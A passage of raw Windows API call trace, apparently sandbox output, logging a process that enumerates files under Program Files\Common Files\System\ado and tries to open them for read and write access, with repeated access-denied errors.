(HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0087.999] AreFileApisANSI () returned 1 [0087.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0087.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d688 [0087.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d688, cchWideChar=37 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System") returned 37 [0088.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System" (normalized: "c:\\program files\\common files\\system"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.000] GetLastError () returned 0x5 [0088.000] GetLastError () returned 0x5 [0088.000] SetLastError (dwErrCode=0x5) [0088.000] GetLastError () returned 0x5 [0088.000] SetLastError (dwErrCode=0x5) [0088.000] GetLastError () returned 0x5 [0088.000] SetLastError (dwErrCode=0x5) [0088.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0088.000] AreFileApisANSI () returned 1 [0088.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0088.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4a) returned 0x6d738 [0088.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x6d738, cchWideChar=37 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System") returned 37 [0088.000] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System" (normalized: "c:\\program files\\common files\\system"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.000] GetLastError () returned 0x5 [0088.000] GetLastError () returned 0x5 [0088.000] SetLastError (dwErrCode=0x5) [0088.000] GetLastError () returned 0x5 [0088.000] SetLastError (dwErrCode=0x5) [0088.000] GetLastError () returned 0x5 [0088.000] SetLastError (dwErrCode=0x5) [0088.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0088.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0088.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0088.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.001] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0088.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0088.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0088.001] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x67608, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x48, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="")) returned 0 [0088.001] FindClose (in: hFindFile=0x78290 | out: hFindFile=0x78290) returned 1 [0088.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0088.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0088.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0088.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0088.001] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\System\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78550 [0088.001] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.001] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0cb0a3f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ado", cAlternateFileName="")) returned 1 [0088.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0088.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0088.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0088.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0088.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0088.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.002] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0088.002] AreFileApisANSI () returned 1 [0088.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado", lpUsedDefaultChar=0x0) returned 41 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0088.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.002] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.002] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0088.003] AreFileApisANSI () returned 1 [0088.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0088.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67480 [0088.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67480, cchWideChar=41 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado") returned 41 [0088.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado" (normalized: "c:\\program files\\common files\\system\\ado"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.003] GetLastError () returned 0x5 [0088.003] GetLastError () returned 0x5 [0088.003] SetLastError (dwErrCode=0x5) [0088.003] GetLastError () returned 0x5 [0088.003] SetLastError (dwErrCode=0x5) [0088.003] GetLastError () returned 0x5 [0088.003] SetLastError (dwErrCode=0x5) [0088.003] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67480 | out: hHeap=0x20000) returned 1 [0088.003] AreFileApisANSI () returned 1 [0088.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 41 [0088.003] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x52) returned 0x67960 [0088.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x67960, cchWideChar=41 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado") returned 41 [0088.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado" (normalized: "c:\\program files\\common files\\system\\ado"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.003] GetLastError () returned 0x5 [0088.003] GetLastError () returned 0x5 [0088.003] SetLastError (dwErrCode=0x5) [0088.003] GetLastError () returned 0x5 [0088.003] SetLastError (dwErrCode=0x5) [0088.003] GetLastError () returned 0x5 [0088.003] SetLastError (dwErrCode=0x5) [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67960 | out: hHeap=0x20000) returned 1 [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0088.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.004] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0088.004] FindNextFileW (in: hFindFile=0x78550, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0088.004] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0088.004] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0088.004] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\System\\ado\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78310 [0088.006] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0cb0a3f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x71169cb5, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.006] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52a0c6a1, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x52a0c6a1, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x52a0c6a1, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3a08, dwReserved0=0x0, dwReserved1=0x0, cFileName="adojavas.inc", cAlternateFileName="")) returned 1 [0088.006] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46048 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ae18 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0088.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.007] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0088.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0088.008] AreFileApisANSI () returned 1 [0088.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc", lpUsedDefaultChar=0x0) returned 54 [0088.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0088.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.008] AreFileApisANSI () returned 1 [0088.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76188 [0088.008] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 54 [0088.008] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0088.010] GetFileType (hFile=0x424) returned 0x1 [0088.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0088.010] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.010] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.010] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.010] CloseHandle (hObject=0x424) returned 1 [0088.010] AreFileApisANSI () returned 1 [0088.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0088.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76020 [0088.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc") returned 54 [0088.010] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\adojavas.inc" (normalized: "c:\\program files\\common files\\system\\ado\\adojavas.inc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.011] GetLastError () returned 0x5 [0088.011] GetLastError () returned 0x5 [0088.011] SetLastError (dwErrCode=0x5) [0088.011] GetLastError () returned 0x5 [0088.011] SetLastError (dwErrCode=0x5) [0088.011] GetLastError () returned 0x5 [0088.011] SetLastError (dwErrCode=0x5) [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0088.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.011] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x529e643a, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x529e643a, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x529e643a, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3b5b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="adovbs.inc", cAlternateFileName="")) returned 1 [0088.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.011] RtlAllocateHeap 